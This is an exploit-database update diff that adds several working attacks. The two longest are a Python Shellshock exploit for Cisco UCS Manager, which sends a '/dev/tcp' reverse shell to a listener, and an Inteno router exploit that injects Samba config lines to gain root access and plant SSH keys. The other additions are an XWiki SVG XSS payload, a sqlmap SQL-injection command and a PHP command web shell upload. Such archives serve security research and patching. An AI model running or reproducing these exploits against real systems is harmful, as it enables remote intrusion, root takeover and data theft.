DB: 2021-01-19

6 changes to exploits/shellcodes

Life Insurance Management System 1.0 - 'client_id' SQL Injection
Life Insurance Management System 1.0 - File Upload RCE (Authenticated)

Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)
Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)
Cisco UCS Manager 2.2(1d) - Remote Command Execution
Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)

exploits/hardware/webapps/49436.py

@@ -0,0 +1,133 @@
+# Exploit Title: Cisco UCS Manager 2.2(1d) - Remote Command Execution
+# Description: An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
+# Date: 1/15/2021
+# Exploit Author: liquidsky (J.McPeters)
+# Vulnerable Software: Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).]
+# Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html
+# Version: 2.2(1d), 2.2(3c)A
+# Cisco Reference: https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888
+# Tested On: Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64))
+# Author Site: https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution
+# Special Notes: This application by default uses outdated TLS 1.0 for communication, so thats why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changes back after exploitation).
+#
+# Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~
+#
+
+import sys, ssl, os, time
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print "+-------------------------------------------------------------+"
+print
+print "-       Cisco Unified Computing System Manager CGI RCE "
+print
+print "          Cisco UCS Manager - 2.2(1d)"
+print
+print "-   PoC by: LiquidSky - 1/15/21  |  CISCO-BUG-ID:  CSCur90888   "
+print
+print "+-------------------------------------------------------------+"
+
+try:
+
+	target		= sys.argv[1]
+	shellip		= sys.argv[2]
+	shellport	= sys.argv[3]
+
+except IndexError:
+
+        print
+	print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0]
+	print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0]
+        print
+	sys.exit()
+	
+def ch3x_w00t():
+     if os.geteuid()==0:
+         print "[*] Running exploit as root."
+     else:
+         print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf"
+         print "[x] Most likely going to see an error..."
+         time.sleep(5)
+
+# Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages...
+def cisco_vuln():
+     ch3x_w00t()
+     print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)"
+     os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak")
+     os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf")
+     print "[*] Checking vulnerable URL "
+     headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+     cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
+#Checking page
+     check = requests.get(cisco_url, headers=headers1, verify=False)
+#Grabbing response
+     res = check.text
+     if "true" in res:
+         return True
+     return False
+
+# Safety check - make sure the user is okay with the TLS1.0 temp fix
+# Shout out to Dean ^^ for keeping me polite...
+
+def exploit_question():
+      print "[x] Warning the service by default uses TLS1.0 so . . ."
+      print
+      print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2"
+      print
+      print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..."
+      print
+      question = raw_input('[!] Do you wish to continue, "yes" or "no" ?')
+      if question == 'yes':
+          print
+          print "[!] Great attempting exploitation checks: " + target + '!'
+          cisco_vuln()
+      else:
+          print
+          print "[x] Stay safe m8 ;) - Read the source, its safe . . "
+          print
+          sys.exit()
+
+exploit_question()
+
+def cisco_response():
+     headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+     cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
+     request = requests.get(cisco_url, headers=headers1, verify=False)
+     if request.status_code == 200:
+         print "[x] Page seems to exist -- Possibly vulnerable?"
+     else:
+         print "[!] Page does not exist - Not vulnerable"
+         print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
+         os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
+         sys.exit()
+
+def cisco_exploit():
+     cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
+     headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+
+     print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + ""
+     print "[?] If this works you will see the exploit hang"
+
+     requests.get(cisco_url, headers=headers, verify=False)
+     print "[!] Shell Sent"
+
+cisco_exploit()
+
+def main():
+     if cisco_vuln():
+         print ""
+         print "[+] Perhaps success?"
+         print ""
+         print "  ^_~  got shellz?   - [ liquidsky | 2021 ]"
+         print
+         print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
+         os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
+     else:         
+         print "[-] failure!"
+         print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
+         os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
+ 
+if __name__ == "__main__":
+     main()

exploits/hardware/webapps/49438.py

@@ -0,0 +1,188 @@
+# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)
+# Date: 2020-03-29
+# Exploit Author: Henrik Pedersen
+# Vendor Homepage: https://intenogroup.com/
+# Version: Iopsys <3.16.5
+# Fixed Version: Iopsys 3.16.5
+# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router
+
+# Description:
+# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno’s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem.
+
+# Patch in release
+# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt
+
+# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/
+
+#!/usr/bin/python3
+import json
+import sys
+import os
+import time
+import argparse
+from websocket import create_connection
+from impacket.smbconnection import SMBConnection
+from impacket.examples.smbclient import MiniImpacketShell
+
+"""
+Root filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5
+
+Usage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>
+
+Requires:
+impacket
+websocket-client
+
+On Windows:
+pyreadline
+
+"""
+
+def ubusAuth(host, username, password):
+    """
+    https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py
+    """
+    ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"])
+    req = json.dumps({
+        "jsonrpc": "2.0", "method": "call",
+        "params": [
+            "00000000000000000000000000000000","session","login",
+            {"username": username,"password": password}
+        ],
+        "id": 666
+    })
+    ws.send(req)
+    response =  json.loads(ws.recv())
+    ws.close()
+    try:
+        key = response.get('result')[1].get('ubus_rpc_session')
+    except IndexError:
+        return None
+    return key
+
+def ubusCall(host, key, namespace, argument, params={}):
+    """
+    https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py
+    """
+    ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"])
+    req = json.dumps({"jsonrpc": "2.0", "method": "call",
+        "params": [key,namespace,argument,params],
+        "id": 666})
+    ws.send(req)
+    response =  json.loads(ws.recv())
+    ws.close()
+    try:
+        result = response.get('result')[1]
+    except IndexError:
+        if response.get('result')[0] == 0:
+            return True
+        return None
+    return result
+
+def auth(host, user, password):
+    print("Authenticating...")
+    key = ubusAuth(host, user, password)
+    if not key:
+        print("[-] Auth failed!")
+        sys.exit(1)
+    print(f"[+] Auth successful")
+    return key
+
+def smb_put(args):
+    username = ""
+    password = ""
+
+    try:
+        smbClient = SMBConnection(args.host, args.host, sess_port=445)
+        smbClient.login(username, password, args.host)
+
+        print("Reading SSH key")
+        try:
+            with open(args.key_path, "r") as fd:
+                sshkey = fd.read()
+        except IOError:
+            print(f"[-] Error reading {args.sshkey}")
+        
+        print("Creating temp file for authorized_keys")
+        try:
+            with open("authorized_keys", "w") as fd:
+                fd.write(sshkey)
+                path = os.path.realpath(fd.name)
+        except IOError:
+            print("[-] Error creating authorized_keys")
+
+        shell = MiniImpacketShell(smbClient)
+        shell.onecmd("use pwned")
+        shell.onecmd("cd /etc/dropbear")
+        shell.onecmd(f"put {fd.name}") 
+
+        print("Cleaning up...")
+        os.remove(path)
+    except Exception as e:
+        print("[-] Error connecting to SMB share:")
+        print(str(e))
+        sys.exit(1)
+
+def main(args):
+    payload = "pwned]\npath=/\nguest ok=yes\nbrowseable=yes\ncreate mask=0755\nwriteable=yes\nforce user=root\n[abc"
+    key = auth(args.host, args.user, args.passwd)
+    print("Adding Samba share...")
+    smbcheck = json.dumps(ubusCall(args.host, key, "uci", "get", {"config":"samba"}))
+    if "pwned" in smbcheck:
+        print("[*] Samba share seems to already exist, skipping")
+    else:
+        smba = ubusCall(args.host, key, "uci", "add", {
+                "config": "samba", 
+                "type":"sambashare", 
+                "values": {
+                    "name": payload, 
+                    "read_only": "no", 
+                    "create_mask":"0775", 
+                    "dir_mask":"0775",
+                    "path": "/mnt/", 
+                    "guest_ok": "yes"
+                    }
+            })
+        if not smba:
+            print("[-] Adding Samba share failed!")
+            sys.exit(1)
+
+    print("Enabling Samba...")
+    smbe = ubusCall(args.host, key, "uci", "set",
+        {"config":"samba", "type":"samba", "values":
+        {"interface":"lan"}})
+    if not smbe:
+        print("[-] Enabling Samba failed!")
+        sys.exit(1)
+
+    print("Committing changes...")
+    smbc = ubusCall(args.host, key, "uci", "commit",
+        {"config":"samba"})
+    if not smbc:
+        print("[-] Committing changes failed!")
+        sys.exit(1)
+    
+    if args.key_path:
+        # Allow the service to start
+        time.sleep(2)
+        smb_put(args)
+        print(f"[+] Exploit complete. Try \"ssh -i id_rsa root@{args.host}\"")
+    else:
+        print("[+] Exploit complete, SMB share added.")
+
+def parse_args(args):
+    """ Create the arguments """
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-u", dest="user", help="Username", default="user")
+    parser.add_argument("-p", dest="passwd", help="Password", default="user")
+    parser.add_argument("-k", dest="key_path", help="Public ssh key path")
+    parser.add_argument(dest="host", help="Target host")
+
+    if len(sys.argv) < 2:
+        parser.print_help()
+        sys.exit(1)
+
+    return parser.parse_args(args)
+
+if __name__ == "__main__":
+    main(parse_args(sys.argv[1:]))

exploits/multiple/webapps/49437.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
+# Date: 17-01-2021
+# Exploit Author: Karan Keswani
+# Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome
+# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
+# Version: Xwiki CMS- 12.10.2
+# Tested on: Windows 10
+
+# Description: XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.
+
+# Additional Information:
+Well I found this vulnerability in Xwiki project based websites but they did not respond so i installed a latest version of Xwiki CMS and hosted on localhost with help of Wamp and then i exploited that vulnerability.
+
+# Attack Vector:
+1) Create 2 accounts:- 1)Victim & 2)Attacker
+2) Login with victim account, there is a option to create new dashboard and there is page says give title and type.( Type of Dashboard:-I created simple page)
+3) Now save view the page,
+4) Now login with attacker account and search and open the dashboard which has been created by victim,
+5) When you open the dashboard there is a comment section option, Go to that comment section & add a comment,there is a upload functionality,
+6) So i tried to upload a sample svg file to check that it will allow to upload .svg format
+7) Now i created a text file with XSS payload and then saved it as a .svg format
+8) Upload your .svg file and click on send it to the server and click ok (your comment will be add)
+9) Now open that comment with the victim account and click on that view image you'll see the xss pop-up.
+
+Xss Payload:-
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<svg
+
+onload="alert('xss')"
+ xmlns="http://www.w3.org/2000/svg">
+</svg>

exploits/php/webapps/49422.py

@@ -1,4 +1,4 @@
-# Exploit Title: Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)
+# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)
 # Date: 19/12/2020
 # Exploit Author: Haboob Team (https://haboob.sa)
 # Vendor Homepage: https://www.nagios.com/products/nagios-xi/

exploits/php/webapps/49439.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
+# Date: 15/1/2021
+# Exploit Author: Aitor Herrero
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
+# Version: 1.0
+# Tested on: Windows /linux /
+
+Login in the application
+
+Go to clientStatus.php?client_id=
+
+sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
+<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>"

exploits/php/webapps/49440.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated)
+# Date: 15/1/2021
+# Exploit Author: Aitor Herrero
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
+# Version: 1.0
+# Tested on: Windows /linux /
+
+Login in the application
+
+Go to Clients and you can add new client o modify existent
+
+Click examination botton and upload a test.php with content:
+
+"<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd =
+($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>"
+
+Click Upload and intercept with burpsuite
+
+Change the content type to image/png
+
+Go to the path
+
+http://localhost:8080/lims/uploads/test.php?cmd=dir

files_exploits.csv

@@ -25884,6 +25884,8 @@ id,file,description,date,author,type,platform,port
 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
+49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
+49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
@@ -43624,7 +43626,7 @@ id,file,description,date,author,type,platform,port
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,
 49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,
 49421,exploits/php/webapps/49421.txt,"Online Movie Streaming 1.0 - Admin Authentication Bypass",2021-01-14,"Richard Jones",webapps,php,
-49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,
+49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,
 49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php,
 49424,exploits/php/webapps/49424.py,"Laravel 8.4.2 debug mode - Remote code execution",2021-01-14,"SunCSR Team",webapps,php,
 49425,exploits/hardware/webapps/49425.py,"Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)",2021-01-14,"Shizhi He",webapps,hardware,
@@ -43635,3 +43637,6 @@ id,file,description,date,author,type,platform,port
 49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php,
 49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,
 49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",2021-01-15,"Audencia Business SCHOOL Red Team",webapps,multiple,
+49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
+49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
+49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,